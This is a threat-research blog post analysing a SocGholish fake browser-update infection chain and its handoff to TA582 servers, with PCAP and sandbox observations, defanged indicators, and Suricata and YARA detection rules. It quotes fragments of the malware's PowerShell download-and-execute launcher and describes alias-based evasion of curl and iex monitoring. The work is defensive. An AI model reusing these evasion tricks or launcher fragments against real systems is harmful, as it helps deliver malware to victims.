TA569 SocGholish Overlap w/TA582 Infra

Intro

This is the long form of my post from here: https://x.com/MalasadaTech/status/1924982337689027063. While browsing urlscan scan tasks, I found crypto-js.min.js usage for obfuscation linked to Tycoon and Storm1747 in Any Run. This led to a hunch that led to identifying TA569 infrastructure and SocGholish. This post may be more wordy, as it documents my analysis process and how I kind of jump from one thing to another.

Tactical Pause

THE CONTENT, VIEWS, AND OPINIONS EXPRESSED ON THIS DOCUMENT ARE MY OWN AND DO NOT REFLECT THOSE OF MY EMPLOYER OR ANY AFFILIATED ORGANIZATIONS. ALL RESEARCH, ANALYSIS, AND WRITING ARE CONDUCTED ON MY PERSONAL TIME AND USING MY OWN PERSONALLY-ACQUIRED RESOURCES. ANY REFERENCES, TOOLS, OR SOFTWARE MENTIONED HERE ARE LIKEWISE USED INDEPENDENTLY AND ARE NOT ASSOCIATED WITH, ENDORSED, OR FUNDED BY MY EMPLOYER.

Flow

I was hunting on for scan tasks that use “crypto-js.min.js” via this urlscan query: https://urlscan.io/search/#filename:%22crypto-js.min.js%22

I was hunting on that because it is used for phishing sites to encrypt the malicious parts.

Here’s a phishing example: https://urlscan.io/result/0196f52e-dfe7-7737-9286-3e1b961a4f0e/#summary. The response here: https://urlscan.io/responses/93e7e44476d64ef928ec053670fda65d4ffa84379f7388853c645165217f33fc/ shows the decryption function to decrypt the malicious code:

In the example above, it was interesting because of the unusual fake captcha. It’s a fake captcha that I have not yet seen.

The graphic appears to be copied from here: https://www.freepik.com/premium-vector/graphic-design-flat-illustration_151473686.htm

The gist of that one is that it takes you to a phishing site after you click the fake captcha. Here’s a n Any Run session that shows the flow: https://app.any.run/tasks/be164f53-1b5f-411c-b49d-a5f44cd6cd32

It is flagged as Tycoon/Storm1747.

That’s the general idea of it. I won’t go more into detail on that one here, but it got me wondering if there were any scan tasks that have abnormal page titles. I started with “update chrome” using this query: https://urlscan.io/search/#page.title%3A%22update%20chrome%22. It would be particularly weird because, from what I’ve observed, TA569 uses TDSs that I don’t normally see rendering the “Update Chrome” landing page. After skimming a bajillion results (8 at the time) I observed look.studiodeux[.]com looked like a SocGholish lookalike.

Here’s the scan result: https://urlscan.io/result/01967ce2-72b9-704a-b88b-d9c826cca6de/#summary

I identified the key part here that appears to be ParrotTDS: https://urlscan.io/responses/54fe0bbd46949e427e32e42be755c0ce5557cb6794aa6960405cd051cf1448d4/

I pivoted on this hash to search for other results: https://urlscan.io/search/#hash%3A54fe0bbd46949e427e32e42be755c0ce5557cb6794aa6960405cd051cf1448d4

Unable to repeat steps on the first two. The first compromised site may have been cleaned up. I was able to get served the SocGholish landing page in the Any Run session here: https://app.any.run/tasks/4b69b12e-3f1f-41c0-8404-c0efae4c5803

I have few callouts before continuing. Aside from the already mentioned thought about how it’s weird that the landing page rendered in urlscan, it’s also weird that the landing page is rendered in Any Run, and I haven’t mentioned it here yet, but it’s weird how it didn’t filter out the request from this Any Run session for the follow-on activity from the fake update JS. I normally don’t get these to go this far.

I had the MITM proxy enabled, so you can download the PCAP and the SSL Keys to follow along.

In stream 36, it first requests the obfuscated JS that will make the first attempt to filter out analysis.

Later in the stream, since the checks were successful, it will send the request for the landing page content.

Stream 61 shows the request and response for the malicious JS. It is notably smaller than what I remember in the past.

In addition to that, you can see that the filename is using unicode characters.

var filename="Chr\u03bfmeU\u0440d\u0430teInst\u0430ller.js"

Just by looking at it you can see they’re substituting the o, the p, and the a characters.

You can’t deobfuscate the malicious JSCRIPT code in deobfuscate.io to extract the next stage URL anymore. It’s cool though, because GROK can provide the next stage domain. The URL is shorter than it really is, profile vs the correct profileLayout, but it’s close enough.

This is confirmed in the Any Run DNS Requests.

You could also validate this in the HTTP stream 73.

PCAP shows the JScript code posts a string value, likely used to ensure a request only gets on response, and the response is code to enumerate the environment, and send it in a POST. We can see the follow-up post that includes the enumerated data. The response to that POST is shown in the snip below.

We can see that the POST response is another JScript. This has an interesting part.

In the snip above, it’s highly obfuscated, but it creates a WScript Shell to execute PowerShell to create the new alias “printout” for curl. Mind you that curl is already an alias for Invoke-WebRequest (or IWR). Why is this important? You might monitor for curl, Invoke-WebRequest, and IWR, but you most likely aren’t monitoring for “printout” usage. You should monitor for logs that show when an alias is created.

Moving back to the Any Run session, we can see that the PowerShell Script tracer shows the first function log is “new-alias printout curl”.

Back in the PCAP, a few lines below we can see that the alias printout is used with the -useb (use basic parsing) parameter for a variable that is obfuscated. Circling back to the topic of monitoring for curl, Invoke-WebRequest, and IWR – it could be possible to monitor for this current implementation by monitoring for PowerShell commands that contain the -useb parameter, but don’t contain curl, Invoke-WebRequest, or IWR. This could work for the current implementation.

In Any Run, we can see that the deobfuscated URL is “hxxp[:]//nzyeyghzrr333b[.]top/f15.svg”

In the PCAP, you can verify that stream 74 is indeed plaintext HTTP over port 80.

This is cool because detections can be made for this activity.

More on that later. It’s an obfuscated PowerShell script, not an SVG file. Back in Any Run we can see that it is executed at number 35 via iex, and the first command is to sleep for 15 seconds.

After it’s all deobfuscated, it will perform enumeration tasks.

Later at number 903, it runs a curl for hjdfikgmhficchm[.]top using the TA582 URL pattern.

I searched the PCAP for this traffic, but was surprised to see there was already traffic to this host before this. It is interesting because it doesn’t show the response payload for the first request when you view it as an HTTP stream. The first request is the request for hxxp[:]//hjdfikgmhficchm[.]top/h%20jziok%20g.php?s=515.

When you follow the TCP stream, you can see it.

I took note of the first variable in the payload, qpyoiaewrncj, and searched for it in the PowerShell Script tracer.

I was wondering what 7dlw3kq was. It’s an alias for invoke-expression.

I checked the end of the script and observed that it is piped to “gotoany”.

gotoany is an alias for iex.

The alias was set a just a bit earlier in the same script. The “set-alias gotoany” part is not obfuscated, but the “iex” part is.

After that executes, it sends the GET request to hxxp[:]//hjdfikgmhficchm[.]top/keqvs806thhtr.php?id=DESKTOP-JGLLJLD&key=55773794640&s=515. In previous reporting, located here: https://malasada.tech/updated-landupdate808-analysis/, I identified that TA582 performs enumeration commands, assigns numerical values, adds them up, and returns the sum as the key. I assess that the key value is a scoring technique to determine if the activity is from an ideal target system, or not. If it is not, the TA582 server will return a fake or decoy resource. In the PCAP snip below, we can see that it is hxxp[:]//hgccpszb1sbaho2[.]com.

The buck stops here because that domain doesn’t exist, and the script execution errors out.

Summary

This documented my thoughts and the steps I took while browsing for malicious activity. This was a bit more wordy because I’m showing my steps. It’s more of a bloggy type of post, and not so much a refined post. It started with me reviewing urlscan results that use “crypto-js.min.js” for malicious obfuscation. It led me to an unusual fake captcha that is flagged as Tycoon and Storm1747 in Any Run. I made the hypothesis that there may urlscan tasks that include “Update Chrome” in the page title. I found one result that used TA569 infra to load the SocGholish landing page. From there, I pivoted on the Parrot TDS hash result to find two other scan tasks. Of the three, one was still SocGholish compromised, and I was able to interact with it in Any Run. From the Any Run session, I was able to observe that after the normal SocGholish JScript file, it uses TA582 infrastructure. The TA582 infrastructure served a few scripts, but then served a decoy resource on the last step that we got to. I’ve made some practice Suricata and YARA rules below. Use with the understanding that these are sort of practice detections, and that you might need to tune them.

Rules

Suricata Rules:

alert http $HOME_NET any -> $EXTERNAL_NET 80 (msg:"TA582 Request for f15.svg"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/f15.svg"; http.user_agent; content:"WindowsPowerShell"; http.host; content:".top"; endswith; sid:1000016; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET 80 (msg:"TA582 outbound check-in v1"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|2E|php|3F|s|3D|"; http.host; content:".top"; endswith; sid:1000017; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET 80 (msg:"TA582 outbound check-in v2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|2E|php|3F|id|3D|"; http.uri; content:"|26|key|3D|"; http.uri; content:"|26|s|3D|"; http.user_agent; content:"WindowsPowerShell"; http.host; content:".top"; endswith; sid:1000018; rev:1;)

Suricata Rules:

Note: I’ve tested these on my dev VM, and I’ve confirmed they match the intended malicious scripts. However, the first rule appears to return many false positives on UnpacMe, and the second YARA rule returns nothing in UnpacMe. The third rule was only tested on my dev VM. I’m limited on options to test under my “MalasadaTech” persona, so I’d recommend keeping in mind that these are more of conceptual rules that would need tuning.

rule SuspiciousPowerShellObfuscationTA582 {
    meta:
        author = "MalasadaTech"
        description = "Suspicious PowerShell Obfuscation rule that checks for keywords that would indicate a large PS script is obfuscated. This matches on the f15.svg file."
    strings:
        $join = "join" nocase
        $char_array = "char" nocase
        $sleep = "start-sleep" nocase
    condition:
        (#join >= 50 or #char_array >= 30 or #sleep >= 2)
}

rule SuspiciousPowerShellPatternsTA582 {
    meta:
        author = "MalasadaTech"
        description = "Suspicious PowerShell Patterns rule that checks for keywords that would indicate a large TA582 PS script is obfuscated. This matches on the response from the /h%20jziok%20g.php?s=515 request."
    strings:
        $s1 = "$executioncontext" nocase
        $s2 = "substring" nocase
        $s3 = "[System.Text.Encoding]::ascii" nocase
        $s4 = "[system.String]::new" nocase
        $s5 = "set-alias" nocase
        $s6 = "[char[]]" nocase
    condition:
        all of ($s1, $s2, $s3, $s4, $s5) and #s6 >= 5
}

rule TA569_Last_Step {
    meta:
        description = "Detects VBScript used in TA569 last step, executing obfuscated PowerShell"
        author = "MalasadaTech"
        date = "2025-05-24"
    strings:
        // Core VBScript sequence with wildcard for execFileName
        $vbscript_core = /var initExeption='0';var runFileExeption='';var runFileResult='';var execFileName='[0-9a-f]+\.ps1';var fs=new ActiveXObject\("Scripting\.FileSystemObject"\);var _tempFilePathExec=fs\.GetSpecialFolder\(2\)\+"\\\\"\+execFileName;if\(initExeption=='0'\)\{try\{var wsh=new ActiveXObject\("WScript\.Shell"\);runFileResult=wsh\.Run\('powershell \$[a-zA-Z]{6}=\\'ur\\';new-alias printout c\$\(\$[a-zA-Z]{6}\)l;/ nocase
    condition:
        $vbscript_core
}

IOCs

173.44.141[.]44

store.alignfrisco[.]com
app.nerduptechnology[.]com
hjdfikgmhficchm[.]top
hgccpszb1sbaho2[.]com

hxxps[:]//store.alignfrisco[.]com/49U5SZj3WiCH9wN71uUVa5H3A2uAsFEwjaZdJo64SzvBqA==
hxxps[:]//store.alignfrisco[.]com/FpEqsG2zSdlysxCCI6EGkmXlT8A0qwjRePBGyWz0ddZmswaSZLMQknngQNZk81vEZ+Fe13/wUNFx/kWSaw==
hxxps[:]//store.alignfrisco[.]com/v/UzysTXUKPb1wn4isUf6MyBVrqdzxGm3ptXo9GSbLnLlEe5ndkRucvXCfuT10HohddQqNCXULLXnEe42oJDrdKSWLPP104=
hxxps[:]//store.alignfrisco[.]com/RBeyPz810VYgNYgNcSeeHTdj109mLZBTJXnWVipw7UwwdsZMZjuQTDA1iAxoNcAdfjXISTF71FowNc8=
hxxps[:]//app.nerduptechnology[.]com/profileLayout
hxxp[:]//nzyeyghzrr333b[.]top/f15.svg
hxxp[:]//hjdfikgmhficchm[.]top/h%20jziok%20g.php?s=515
hxxp[:]//hjdfikgmhficchm[.]top/keqvs806thhtr.php?id={computer_name}&key={key}&s=515
hgccpszb1sbaho2[.]com